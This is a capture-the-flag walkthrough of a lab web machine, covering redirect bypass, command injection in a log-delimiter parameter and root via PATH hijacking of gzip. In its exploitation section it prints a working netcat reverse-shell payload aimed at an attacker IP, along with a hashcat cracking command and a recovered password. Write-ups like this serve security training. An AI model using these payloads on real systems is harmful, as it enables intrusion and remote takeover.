ENUMERATION
Nmap tcp full scan
ennemappo.sh 10.10.10.13 ./The custom nmap script output highlighted the presence of:
- SSH on port 22:
OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 - web server on port 80:
Apache httpd 2.4.29
EXPLOITATION
Visiting http://10.10.11.104 redirects the browser to a login form at /login.php. Sql injections attempts failed.
Content discovery with gobuster indicated some interesting paths all of which resulted in a redirect to the login page.
gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.11.104 -x php,html,txt
If we visit the/accounts.php page it is clear, through Burp, that the content of the page, which should be visible only to an authenticated user, is served by the web server and a redirection to /login.php page is performed.
To access the page content we need to bypass the redirect. Then intercept the response to /accounts.php, delete the Location: login.php header and finally forward the request to the server.
Then we can access the page via browser and create a new user.
At /file_logs.php there is a function which allows to choose a delimiter and generates a log file with the selected delimiter.
At /files.php a backup of the website source code is available.
config.php file contains mysql db credentials. Let’s take note of that for the privilege escalation phase.
logs.php file reveals that a command injection is present because we can manipulate the delim parameter in the POST request sent by the browser when /file_logs.php function is used. This parameter is concatenated within theexec() function.
This is the normal request which is sent to generate the log file.
We can inject this payload to get a reverse shell:
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.13 4444 >/tmp/fThe malicious POST request is the following:
We get a reverse shell as www-data user.
PRIVILEGE ESCALATION
Upgrade the shell with python and then check if mysql port is listening since we found the db user and password.
python -c 'import pty; pty.spawn("/bin/bash")'
Authenticate into the db using mysql.
The preivse database includes the hashed password for the user m4lwhere .
Looking for the type of the hash at https://hashcat.net/wiki/doku.php?id=example_hashes it seems to be a md5crypt.
Crack the hash using hashcat with the relative parameter (500).
hashcat -m 500 -a 0 hash /usr/share/wordlists/rockyou.txtThe plaintext password is ilovecody112235! .
We can use the above password to ssh into the target as m4lwhere user.
sudo -l output shows that a script can be executed as root without password.
The script invokes gzip without specifying the absolute path of the binary.
This means that we can create a malicious gzip binary in an arbitrary directory and export that directory as the first one within the PATH variable in order to be searched first when the command gzip is executed.
As you can see /tmp directory is added as the first one. Then a gzip file containing a reverse shell is created and made executable.
The script consequently will run the malicious binary and a high privilege reverse shell is obtained.
LESSONS LEARNED
- Analyze HTTP 3xx responses through an intercepting proxy to look for unexpected content and eventually bypass the redirect in order to access the content.
- User input concatenation within dangerous function like
exec()can leads to RCE. - The usage of relative paths (e.g.
gzip) for binaries invoked within scripts executed as privileged user can lead to privilege escalation via path hijacking.
